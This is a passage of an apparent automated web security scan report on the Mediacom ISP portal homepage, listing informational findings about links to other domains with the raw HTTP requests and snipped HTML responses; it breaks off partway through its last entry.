<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.7. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=35 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=34
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313404306952; dslv=1313404306953; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 11:00:18 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 132366
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=36" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;9a84b3f3;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;0a720b96;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/27.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.8. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=33 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=32
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313400816573; dslv=1313400816574; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 10:02:22 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133695
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=34" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;c6280d61;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;1c34b7b2;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/27.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.9. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=29 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313393835053; dslv=1313393835054; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 08:05:15 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133416
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=30" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;ad4904e8;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;c1369f1e;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/29.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.10. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=19 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313376377662; dslv=1313376377663; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 03:15:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135728
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=20" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;d73f3adc;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;f5a8cb38;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/27.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.11. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=6 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313353684303; dslv=1313353684303; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 20:56:47 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
